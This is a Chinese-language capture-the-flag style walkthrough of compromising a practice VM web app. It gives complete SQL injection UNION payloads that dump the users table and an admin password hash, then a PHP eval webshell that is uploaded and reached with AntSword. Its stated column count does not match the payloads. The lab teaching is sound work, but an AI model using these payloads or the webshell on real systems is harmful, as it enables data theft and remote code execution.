1.靶机准备
安装至虚拟机,查看虚拟网卡ip,虚拟机网络配置为NAT模式,打开虚拟机。
2.查询虚拟机的ip
目的为找到网站,使用御剑2014扫描。
3.查询该站点下目录
目的为找到该网站下的站点,使用御剑后台扫描工具遍历查询目录。
发现共有5个网址,通过一一访问,我们并没有发现注入点,但该站点有注册、登录功能,我们可以去注册、登录进去看是否有注入点。
注:有的电脑可能因为安装包或环境原因,登录进去后,必须先以空值search一下,才会显示出内容。
4.判断漏洞类型
我们注册后会发现,会在页面上显示用户名,可以尝试XSS注入,但是失败了。
该网站有登录,注册界面,我们可以尝试二次注入,但是由于没有修改账户的页面,也宣告失败。
最后经判断为sql注入类型。
5.sql注入流程
1)查看有没有sql注入
OSINT’ and 1=1 #
OSINT’ and 1=2 #
这里得输入book title值才能判断。
2)判断字段数
OSINT' order by 3 #
字段数为4。
3)查看数据库名
-1' union select 1,database(),3 #
这里开始就可以使用id值(不存在的值)了,我们为了方便就直接使用了。
4)查看数据库表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #
5)查看users表所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #
6)查看数据
-1' union select group_concat(user),group_concat(pasword),3 from users#
我们发现有个superadmin(超级管理员账户),我们直接使用该账号重新登录。
superadmin
2386acb2cf356944177746fc92523983(为MD5加密,使用在线平台可直接得出)
密码解密得:Uncrackable
6.以管理员账户登录
进去可以看到可以上传文件,尝试上传一句话木马。
shell.php:
<?php phpinfo();eval($_POST['cmd']);?>
发现直接成功。
7.使用蚁剑连接
通关成功。